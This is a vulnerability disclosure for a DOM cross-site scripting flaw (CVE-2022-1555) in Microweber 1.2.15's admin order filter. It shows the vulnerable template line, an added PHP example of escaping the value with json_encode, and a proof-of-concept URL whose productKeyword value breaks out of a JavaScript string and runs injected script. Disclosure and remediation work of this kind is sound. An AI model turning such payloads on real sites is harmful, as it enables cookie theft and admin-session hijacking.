CVE-2022-1555: DOM XSS in microweber ver 1.2.15 in microweber

DOM XSS in Microweber version 1.2.15, in the GitHub repository microweber/microweber prior to 1.2.16. An attacker can inject arbitrary JavaScript code, deface the website, or steal cookies.


Description

Hi there, your latest-version Docker image 3463db62a01f is vulnerable to DOM XSS.

Proof of Concept

http://localhost/admin/order?filteringResults=true&id=1&isPaid=1&keyword=1&maxDate=01/01/1967&maxPrice=1&minDate=01/01/1967&minPrice=1&orderStatus=new&productId=the&productKeyword=the9958%22%0a%09%09%09%09});%0a%09%09%09});%0a%09%09alert(origin);%0a%09%09%09$(document).ready(function%20()%20{%0a%09%09%09%09var%20searchOrdersByProduct%20=%20new%20mw.autoComplete({%0a//

Impact

Injection of arbitrary JavaScript code, defacement of the website, theft of cookies, etc.

Occurrences

order_filtering.blade.php L157

DOM code

$(document).ready(function () {
    var searchOrdersByProduct = new mw.autoComplete({
        element: "#js-orders-search-by-products",
        // Sink: the user-controlled productKeyword query parameter is echoed
        // unescaped into this JavaScript string literal.
        placeholder: "<?php if ($productKeyword) { echo $productKeyword; } else { _e("Search by products..."); }?>",
        autoComplete: true,
        ajaxConfig: {
            method: 'get',
            url: mw.settings.api_url + 'get_content_admin?get_extra_data=1&content_type=product&keyword=${val}'
        },
        map: {
            value: 'id',
            title: 'title',
            image: 'picture'
        }
    });
    $(searchOrdersByProduct).on("change", function (e, val) {
        $(".js-orders-search-product").val(val[0].id).trigger('change');
        $(".js-orders-search-product-keyword").val(val[0].title).trigger('change');
    });
});
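The template line above writes the raw value of $productKeyword into a JavaScript string literal, so a double quote in the value ends the literal and whatever follows is parsed as script. The following is an added example, not code from the Microweber project or from the report: it places that pattern beside a hardened form that emits the value with json_encode() and the JSON_HEX_* flags. The function name jsStringLiteral is chosen here, and the sample value is constructed to mirror the shape of the PoC payload.

```php
<?php
// Added example, not Microweber's code. It contrasts the template line shown
// above (the raw value of $productKeyword echoed into a JavaScript string
// literal) with one safe way to emit the same value: json_encode() with the
// JSON_HEX_* flags. The result is a complete, double-quoted JS string literal
// in which ", ', <, >, & and every control character are \uXXXX or \n style
// escapes, so nothing in the value can end the literal early, and no
// "</script>" in the value can close the surrounding <script> element.
function jsStringLiteral(string $value): string
{
    // JSON_THROW_ON_ERROR: invalid UTF-8 raises JsonException instead of
    // silently returning false (which would concatenate as an empty string).
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// Constructed sample modelled on the shape of the report's PoC: a quote that
// would end the placeholder string, line breaks and tabs, then a statement.
$productKeyword = "9958\"\n\t\t\t\t});\n\t\t\t});\n\t\talert(origin);";

// Before (the pattern from order_filtering.blade.php): string concatenation
// stands in for the template's `echo`. The embedded " ends the literal and
// the remainder of the value is parsed as JavaScript.
$vulnerable = 'placeholder: "' . $productKeyword . '",';

// After: the literal, delimiters included, is produced by json_encode().
$hardened = 'placeholder: ' . jsStringLiteral($productKeyword) . ',';

echo "vulnerable:\n", $vulnerable, "\n\nhardened:\n", $hardened, "\n";

// Sanity check on the hardened form: between its two delimiting quotes there
// is no raw double quote, angle bracket or line break left to break out with.
$inner = substr(jsStringLiteral($productKeyword), 1, -1);
if (preg_match('/["<>\r\n]/', $inner) !== 0) {
    throw new RuntimeException('encoder left a dangerous character unescaped');
}
```

Run it with `php example.php`; the hardened line prints as a single string literal with the quote and whitespace of the payload shown as `\u0022`, `\n` and `\t`. If the file is compiled by Laravel's Blade (which the .blade.php suffix suggests), the `@json` directive applies these same four JSON_HEX flags, so `placeholder: @json($productKeyword),` is the equivalent one-line form; the `{{ }}` escaping is designed for HTML text and attribute contexts rather than for string literals inside a script block.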
